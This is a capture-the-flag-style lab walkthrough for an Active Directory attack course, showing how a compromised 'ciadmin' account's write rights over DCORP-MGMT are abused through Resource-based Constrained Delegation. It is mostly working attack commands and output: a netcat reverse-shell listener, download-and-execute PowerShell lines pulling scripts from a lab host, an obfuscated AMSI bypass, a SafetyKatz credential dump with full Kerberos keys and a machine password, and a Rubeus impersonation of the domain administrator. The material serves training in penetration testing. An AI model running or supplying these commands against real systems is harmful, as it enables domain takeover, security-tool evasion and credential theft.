17 - LO1️7️
Learning Object 17
Tasks
1 - Find a computer object in dcorp domain where we have Write permissions
2 - Abuse the Write permissions to access that computer as Domain Admin
Flag 28 [dcorp-dc] - Computer account on which ciadmin can configure Resource-based Constrained Delegation 🚩
Solutions
1 - Find a computer object in dcorp domain where we have Write permissions
Let's use PowerView from a PowerShell session started using Invisi-Shell to enumerate Write permissions for a user that we have compromised.
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Powerview.ps1
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}ObjectDN : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1121
IdentityReferenceName : ciadmin
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : user
2 - Abuse the Write permissions to access that computer as Domain Admin
Recall that we compromised ciadmin from dcorp-ci (on learning object 5). We can either use the reverse shell we have on dcorp-ci as ciadmin or extract the credentials from dcorp-ci.
Let's use the reverse shell that we have and load PowerView there:
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 1339
iex (iwr http://172.16.100.67/sbloggingbypass.txt -UseBasicParsing)
S`eT-It`em ( 'V'+'aR' + 'IA' + (("{1}{0}"-f'1','blE:')+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a')) ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.67/PowerView.ps1'))Now, set RBCD on dcorp-mgmt for the student VMs. You may like to set it for all the student VMs in your lab instance so that your fellow students can also try it:
Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std867$' -Verboseand check if RBCD is set correctly:
Get-DomainRBCD
Get AES keys of your student VM (as we configured RBCD for it above). Run the below command from an elevated shell:
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::evasive-keys" "exit"mimikatz(commandline) # sekurlsa::evasive-keys
Authentication Id : 0 ; 5060531 (00000000:004d37b3)
Session : Interactive from 0
User Name : student867
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 5/18/2025 10:07:04 PM
SID : S-1-5-21-719815819-3726368948-3917688648-20607
* Username : student867
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
rc4_hmac_nt 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_old 320e675610942d625c9a2aeaaf357b4a
rc4_md4 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_nt_exp 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_old_exp 320e675610942d625c9a2aeaaf357b4a
Authentication Id : 0 ; 282875 (00000000:000450fb)
Session : RemoteInteractive from 2
User Name : student867
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 5/18/2025 3:18:24 PM
SID : S-1-5-21-719815819-3726368948-3917688648-20607
* Username : student867
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
rc4_hmac_nt 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_old 320e675610942d625c9a2aeaaf357b4a
rc4_md4 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_nt_exp 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_old_exp 320e675610942d625c9a2aeaaf357b4a
Authentication Id : 0 ; 257517 (00000000:0003eded)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/18/2025 3:18:22 PM
SID : S-1-5-90-0-2
* Username : DCORP-STD867$
* Domain : dollarcorp.moneycorp.local
* Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
* Key List :
aes256_hmac 74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
aes128_hmac ea00a74065da6eeb8059498838f3bbc1
rc4_hmac_nt 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old 70bc24a10d8a3108876fc77b99c590ec
rc4_md4 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_nt_exp 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old_exp 70bc24a10d8a3108876fc77b99c590ec
Authentication Id : 0 ; 257479 (00000000:0003edc7)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/18/2025 3:18:22 PM
SID : S-1-5-90-0-2
* Username : DCORP-STD867$
* Domain : dollarcorp.moneycorp.local
* Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
* Key List :
aes256_hmac 74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
aes128_hmac ea00a74065da6eeb8059498838f3bbc1
rc4_hmac_nt 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old 70bc24a10d8a3108876fc77b99c590ec
rc4_md4 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_nt_exp 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old_exp 70bc24a10d8a3108876fc77b99c590ec
Authentication Id : 0 ; 256758 (00000000:0003eaf6)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 5/18/2025 3:18:22 PM
SID : S-1-5-96-0-2
* Username : DCORP-STD867$
* Domain : dollarcorp.moneycorp.local
* Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
* Key List :
aes256_hmac 74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
aes128_hmac ea00a74065da6eeb8059498838f3bbc1
rc4_hmac_nt 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old 70bc24a10d8a3108876fc77b99c590ec
rc4_md4 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_nt_exp 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old_exp 70bc24a10d8a3108876fc77b99c590ec
Authentication Id : 0 ; 51592 (00000000:0000c988)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/18/2025 3:16:25 PM
SID : S-1-5-90-0-1
* Username : DCORP-STD867$
* Domain : dollarcorp.moneycorp.local
* Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
* Key List :
aes256_hmac 74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
aes128_hmac ea00a74065da6eeb8059498838f3bbc1
rc4_hmac_nt 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old 70bc24a10d8a3108876fc77b99c590ec
rc4_md4 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_nt_exp 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old_exp 70bc24a10d8a3108876fc77b99c590ec
Authentication Id : 0 ; 51562 (00000000:0000c96a)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/18/2025 3:16:25 PM
SID : S-1-5-90-0-1
* Username : DCORP-STD867$
* Domain : dollarcorp.moneycorp.local
* Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
* Key List :
aes256_hmac 74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
aes128_hmac ea00a74065da6eeb8059498838f3bbc1
rc4_hmac_nt 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old 70bc24a10d8a3108876fc77b99c590ec
rc4_md4 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_nt_exp 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old_exp 70bc24a10d8a3108876fc77b99c590ec
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-STD867$
Domain : dcorp
Logon Server : (null)
Logon Time : 5/18/2025 3:16:24 PM
SID : S-1-5-20
* Username : dcorp-std867$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 02698bbddb51903271ff8400c7ce6c83af2f638a0c450f8a18005160c8558f93
rc4_hmac_nt 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old 70bc24a10d8a3108876fc77b99c590ec
rc4_md4 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_nt_exp 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old_exp 70bc24a10d8a3108876fc77b99c590ec
Authentication Id : 0 ; 27191 (00000000:00006a37)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 5/18/2025 3:16:24 PM
SID : S-1-5-96-0-0
* Username : DCORP-STD867$
* Domain : dollarcorp.moneycorp.local
* Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
* Key List :
aes256_hmac 74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
aes128_hmac ea00a74065da6eeb8059498838f3bbc1
rc4_hmac_nt 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old 70bc24a10d8a3108876fc77b99c590ec
rc4_md4 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_nt_exp 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old_exp 70bc24a10d8a3108876fc77b99c590ec
Authentication Id : 0 ; 4584063 (00000000:0045f27f)
Session : Interactive from 0
User Name : student867
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 5/18/2025 9:08:19 PM
SID : S-1-5-21-719815819-3726368948-3917688648-20607
* Username : student867
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
rc4_hmac_nt 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_old 320e675610942d625c9a2aeaaf357b4a
rc4_md4 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_nt_exp 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_old_exp 320e675610942d625c9a2aeaaf357b4a
Authentication Id : 0 ; 282931 (00000000:00045133)
Session : RemoteInteractive from 2
User Name : student867
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 5/18/2025 3:18:24 PM
SID : S-1-5-21-719815819-3726368948-3917688648-20607
* Username : student867
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
rc4_hmac_nt 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_old 320e675610942d625c9a2aeaaf357b4a
rc4_md4 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_nt_exp 320e675610942d625c9a2aeaaf357b4a
rc4_hmac_old_exp 320e675610942d625c9a2aeaaf357b4a
Authentication Id : 0 ; 27152 (00000000:00006a10)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 5/18/2025 3:16:24 PM
SID : S-1-5-96-0-1
* Username : DCORP-STD867$
* Domain : dollarcorp.moneycorp.local
* Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
* Key List :
aes256_hmac 74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
aes128_hmac ea00a74065da6eeb8059498838f3bbc1
rc4_hmac_nt 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old 70bc24a10d8a3108876fc77b99c590ec
rc4_md4 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_nt_exp 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old_exp 70bc24a10d8a3108876fc77b99c590ec
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-STD867$
Domain : dcorp
Logon Server : (null)
Logon Time : 5/18/2025 3:16:23 PM
SID : S-1-5-18
* Username : dcorp-std867$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 02698bbddb51903271ff8400c7ce6c83af2f638a0c450f8a18005160c8558f93
rc4_hmac_nt 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old 70bc24a10d8a3108876fc77b99c590ec
rc4_md4 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_nt_exp 70bc24a10d8a3108876fc77b99c590ec
rc4_hmac_old_exp 70bc24a10d8a3108876fc77b99c590ec
mimikatz(commandline) # exitWith Rubeus, abuse the RBCD to access dcorp-mgmt as Domain Administrator - Administrator, considering dcorp-std867$:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-std867$ /aes256:02698bbddb51903271ff8400c7ce6c83af2f638a0c450f8a18005160c8558f93 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /pttCheck if we can access dcorp-mgmt:
winrs -r:dcorp-mgmt cmd
set username
set computername
Flag 28 [dcorp-dc] - Computer account on which ciadmin can configure Resource-based Constrained Delegation 🚩
ObjectDN : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1121
IdentityReferenceName : ciadmin
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : userDCORP-MGMT is the computer account on which ciadmin can configure Resource-based Constrained Delegation.
Last updated